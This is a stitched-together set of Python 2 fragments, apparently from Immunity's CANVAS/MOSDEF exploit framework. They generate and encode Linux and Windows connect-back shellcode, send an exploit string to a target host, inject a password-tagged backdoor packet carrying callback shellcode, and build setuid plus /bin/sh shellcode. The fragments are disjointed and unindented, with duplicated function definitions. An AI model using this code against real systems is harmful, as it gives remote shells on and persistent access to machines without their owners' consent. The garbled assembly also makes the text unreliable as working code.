def createShellcode(self):
self.log("Using GO Linux findsck shellcode with MOSDEF")
import shellcodeGenerator
self.createLinuxGOShellcode(self.badstring) #initial shellcode
myshellcode=shellcodeGenerator.linux_X86()
myshellcode.addAttr("read_and_exec",{"fdreg": "ebx"})
self.stage2=myshellcode.get()
def getGOcode():
# this is called from tcpexploit
# where encoding is taken care of
sc = shellcodeGenerator.linux_X86()
sc.addAttr("oldGOFindSock", None)
shellcode = sc.get()
return shellcode
def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
if self.version == 0:
self.localhost = localhost
self.localport = localport
return ""
if self.versions[self.version][0].count("Windows"):
sc = shellcodeGenerator.win32()
#sc.addAttr("ForkLoad", None)
# the to fork code
#sc.addAttr("revert_to_self_before_importing_ws2_32", None)
#sc.addAttr("unhandled_exception_filter",None)
self.log("Generating shellcode with port %s and ip %s" %
(localport, localhost))
sc.addAttr("tcpconnect", {
"port": localport,
"ipaddress": localhost
})
sc.addAttr("RecvExecWin32", {"socketreg": "FDSPOT"}) #MOSDEF
self.shellcode = sc.get()
self.log("Raw win32 shellcode length: %d" % len(self.shellcode))
#return self.createWin32Shellcode(self.badstring,localhost,localport)
elif self.versions[self.version][0].count("Linux"):
#self.shellcode="\xcc"*500
myshellcode = shellcodeGenerator.linux_X86()
if localport == 0:
self.log("Why is port zero?")
return ""
myshellcode.addAttr("connect", {
"ipaddress": localhost,
"port": localport
})
myshellcode.addAttr("read_and_exec", {"fdreg": "esi"})
self.shellcode = myshellcode.get()
else:
self.log("Cannot yet create shellcode for version %d" %
self.version)
return ""
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(self.badstring)
self.log("Encoding shellcode")
self.shellcode = encoder.encode(self.shellcode)
#self.shellcode = "\xcc"+self.shellcode
if self.shellcode == "":
self.log("Problem encoding shellcode")
return 0
self.log("Shellcode length: %d" % len(self.shellcode))
if len(self.shellcode) > 1020:
self.log(
"Warning shellcode is %d bytes - longer than the 1020 available..."
% (len(self.shellcode)))
return self.shellcode
def getcallbackcode(localip, localport, proc="x86"):
"""
Standard callback shellcode for MOSDEF - normalizes the stack
Does not do any encoding
Only for x86 for now.
"""
myshellcode = shellcodeGenerator.linux_X86()
#you need a linux execve listener on the host and port...
myshellcode.addAttr("Normalize Stack", [0])
myshellcode.addAttr("connect", {"ipaddress": localip, "port": localport})
#myshellcode.addAttr("addcode",["movl %esi,%ebx\n"]) #read needs ebx to be the socket
#myshellcode.addAttr("debugme",None)
myshellcode.addAttr("read_and_exec", {"fdreg": "esi"})
shellcode = myshellcode.get()
return shellcode
def createShellcode(self):
localhost = self.callback.ip
localport = self.callback.port
myshellcode = shellcodeGenerator.linux_X86()
myshellcode.addAttr("connect", {
"ipaddress": localhost,
"port": localport
})
myshellcode.addAttr("read_and_exec", {"fdreg": "esi"})
shellcode = myshellcode.get()
badstring = "\x00"
encoder = chunkedaddencoder.intelchunkedaddencoder()
encoder.setbadstring(badstring)
self.shellcode = encoder.encode(shellcode)
if self.shellcode == "":
raise Exception, "error encoding shellcode"
self.log("Shellcode length: %d" % len(self.shellcode))
return self.shellcode
def run(self):
#print "Self.version=%d"%self.version
if self.version == 0:
if self.runTest() == 0:
self.log("Not continuing since test failed to set version")
return 0
else:
self.createShellcode()
if self.fillstacks() == 0:
return 0
self.log("Done filling all stacks")
try:
#s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s = self.gettcpsock()
s.connect((self.host, self.port))
except:
self.log(
"Connection attempt reported no open socket - service died?")
return 0
sploitstring = self.makesploit()
self.websend(s, sploitstring)
sck = s
verstr = self.versions[self.version][0]
if verstr.count("Linux"):
myshellcode = shellcodeGenerator.linux_X86()
myshellcode.addAttr("setblocking", None)
myshellcode.addAttr("read_and_exec", {"fdreg": "ebx"})
sc = myshellcode.get()
if linuxshell.doGOhandshake(s, secondstage=sc):
node = linuxNode()
node.parentnode = self.socknode
linuxMosdefShellServer.linuxshellserver(
s, node, logfunction=self.logfunction)
self.log("Calling startup for MOSDEF shell server")
node.startup()
self.setInfo("%s attacking %s:%d (Succeeded!)" %
(NAME, self.host, self.port))
return node
#data=self.webrecv(s)
#self.log("Data=%s"%data)
return 1
def injectMosdef(self, node):
#first generate our callback shellcode
sc = shellcodeGenerator.linux_X86()
sc.addAttr('mmap_callback', {
'host': self.callback.ip,
'port': self.callback.port
})
shellcode = sc.get()
packet = ""
packet += "immbkd"
#do md5 calculation
##m = md5.new()
m = hashlib.md5()
n = self.passwd + shellcode
print("Dumping string before MD5")
for c in n:
print "%#x" % ord(c),
print("\n*****************************\n")
m.update(n)
print(self.passwd)
print(m.hexdigest())
packet += m.digest()
packet += struct.pack("<L", len(shellcode))
packet += shellcode
for c in packet:
print "%#02x" % ord(c),
print("\n\n")
#Debug
s = self.gettcpsock()
self.log("Injecting packet on %s port %d" % (self.host, self.port))
try:
s.connect((self.host, self.port))
except socket.error:
self.log("No connection...")
return 0
s.send(packet)
s.close()
return 1
print """
Add Encoder 1.0, Immunity, Inc.
usage: addencoder.py -f shellcode
"""
sys.exit(2)
#this stuff happens.
if __name__ == '__main__':
print "Running Chunked Additive Encoder v 1.0"
app = intelchunkedaddencoder()
sys.path.append("./shellcode")
import shellcodeGenerator
myshellcode = shellcodeGenerator.linux_X86()
#myshellcode.addAttr("Normalize Stack",[0])
#myshellcode.addAttr("dup2",None)
myshellcode.addAttr("setuid", None)
#myshellcode.addAttr("debugme",None)
myshellcode.addAttr("execve", {
"argv": ["/bin/sh", "-i"],
"envp": [],
"filename": "/bin/sh"
})
sc = myshellcode.get()
app.setbadstring("\x00\r\n\x20&")
data = app.encode(sc)
print "Shellcode=%s" % hexprint(data)
import makeexe
def createShellcode(self):
sc = shellcodeGenerator.linux_X86()
sc.addAttr('read_and_exec', {'fdreg': 'ebx'})
sc = sc.get()
def getNewGOcodeWithShell():
import shellcodeGenerator
sc = shellcodeGenerator.linux_X86()
sc.addAttr("GOFindSockWithShell", None)
shellcode = sc.get()
return shellcode
